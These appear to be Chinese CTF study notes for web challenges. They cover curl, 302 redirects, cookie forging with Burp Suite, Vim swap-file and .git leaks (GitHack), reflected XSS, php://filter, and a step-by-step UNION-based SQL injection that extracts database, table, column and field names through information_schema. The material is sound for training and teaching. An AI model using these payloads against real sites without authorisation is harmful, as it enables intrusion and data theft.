知识点
curl:
-
一个无比有用的网站开发工具,curl 还是常用的命令行工具,用来请求 Web 服务器。
- curl网站开发指南 http://www.ruanyifeng.com/blog/2011/09/curl.html
- curl 的用法指南 https://www.ruanyifeng.com/blog/2019/09/curl-reference.html
302重定向:
- 302重定向又称之为暂时性转移(Temporarily Moved ),英文名称:302 redirect。 也被认为是暂时重定向(temporary redirect),一条对网站浏览器的指令来显示浏览器被要求显示的不同的URL,当一个网页经历过短期的URL的变化时使用。一个暂时重定向是一种服务器端的重定向,能够被搜索引擎蜘蛛正确地处理。
- 302临时性重定向:用户的浏览器在收到响应后,输入栏仍是显示旧网址,但是显示的是新网址的内容。
- 例1:手机呼叫转移。明明打进了同学的电话,却均被转移到了妈妈的手机接听。
- 例2:服务的延续。因为域名到期不想续费,一个页面便换了新的域名,但是还有很多忠实的用户一直访问的老域名,这样可以对老域名配置302跳转到新的域名,保证服务的延续。
Cookie的伪造:
- 利用 burpsuite 把包截下来修改 Cookie 。
利用 Burpsuite 爆破:
phpinfo:
- phpinfo是一个运行指令,为显示php服务器的配置信息。
- 搜索快捷键 ctrl + f
vim:
- Vim是一个文本编辑器。Vim具有代码编译、补完以及错误跳转等编程功能,在程序员中被广泛使用。
- Vim 的交换文件 .filename.swp 默认交换文件在打开文件的时候就会产生交换文件,正常退出的时候才会删除交换文件(断电,Ctrl+Z强制退出就不会删除)...第一次产生的交换文件名为 .index.filename.swp 再次意外退出后,将会产生名为 .index.filename.swo 的交换文件第三次产生的交换文件则为 .index.filename.swn
反射型xss
-
XSS漏洞本质是攻击网站用户,攻击的方式是让恶意的javascript在用户的浏览器里执行,攻击效果可能是多种多样,比如盗取用户信息、用户访问劫持。
-
攻击者可以向网站注入恶意的javascript代码,当受害用户访问这个javascript代码,攻击就发生了。
-
做题可借助 XSS 网站 https://xss8.cc/bdstatic.com/
php://filter/
- php://filter是文件上传漏洞经常要有的一个参数,用于数据流打开时的筛选过滤应用,访问网站本地文件,在面对一些CTF题卡一些黑白名单会很好用
- 具体文件包含漏洞php://filter相关知识可见 https://blog.csdn.net/qq_42263820/article/details/111130520
Git
- Git 是一个开源的分布式版本控制系统,用于敏捷高效地处理任何或小或大的项目。
- GitHack工具使用 clone源码 python GitHack.py url/.git
-
Git命令与GitHub使用可参考 https://blog.csdn.net/weixin_45254208/article/details/107810572
Subversion,简称SVN
- Subversion,简称SVN,是一个开放源代码的版本控制系统
SQL注入
- SQL注入即是指web应用程序对用户输入数据的合法性没有判断或过滤不严,攻击者可以在web应用程序中事先定义好的查询语句的结尾上添加额外的SQL语句,在管理员不知情的情况下实现非法操作,以此来实现欺骗数据库服务器执行非授权的任意查询,从而进一步得到相应的数据信息。
- CTFHub中SQL注入 输入1会回显信息,输入错误的 信息什么也不显示
- 查看显示位 id=-1 select 1,2 显示
- 求数据库名 id=-1 select 1,database()
- 求表名 id=-1 select 1,group_concat(table_name) from information_schema.tables where table_schema='sqil'
- 求列名 id=-1 select 1,group_concat(column_name) from information_schema.columns where table_schema='sqil' and table_name='zmvauockjd'
- 求字段值 id=-1 select 1,group_concat(oaftdtxixz) from sqli.zmvauockjd